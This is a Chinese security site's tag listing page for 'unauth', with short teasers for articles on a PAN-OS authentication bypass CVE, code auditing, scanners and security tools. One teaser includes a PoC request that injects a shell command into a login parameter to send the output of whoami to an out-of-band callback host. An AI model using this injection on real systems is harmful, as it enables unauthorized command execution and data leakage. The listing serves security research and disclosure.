unauth | CN-SEC 中文网

安全文章

CVE-2025-0108：通过 PAN-OS Nginx/Apache 路径混淆实现的身份验证绕过漏洞 _

目标PAN OS 10.2.x < 10.2.13-h3PAN OS 11.0.x < 11.1.6-h1PAN OS 11.2.x < 11.2.4-h4解释CVE-2025-01...

04月07日62 views评论

安全漏洞

在之前的博客文章中，我们非常详细地展示了破坏应用程序所采取的广泛步骤 - 提取 HTTP 路由、搜索参数，以及我们如何将部分功能限定为目标软件中的“感兴趣”。重新打破。然而，在这一切发生之前，必须做出...

10月07日128 views评论

安全文章

POCPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Host...

05月30日53 views评论

代码审计

漏洞扫描模块总体架构框架目录.├── kunpeng.py├── kunpeng_c.dll├── kunpeng_c.dylib├── kunpeng_c.so├── vuldb│ ├── Conf...

04月21日36 views评论

安全工具

=================================== 免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，...

03月26日442 views评论

安全工具

2.0版本经过一段时间的用户反馈，现已相对稳定。目前第一阶段以漏洞验证为核心的需求均已完成。本篇从解决问题的角度介绍这个框架，希望能得到大家的改进建议。项目地址: https://git...

05月23日75 views评论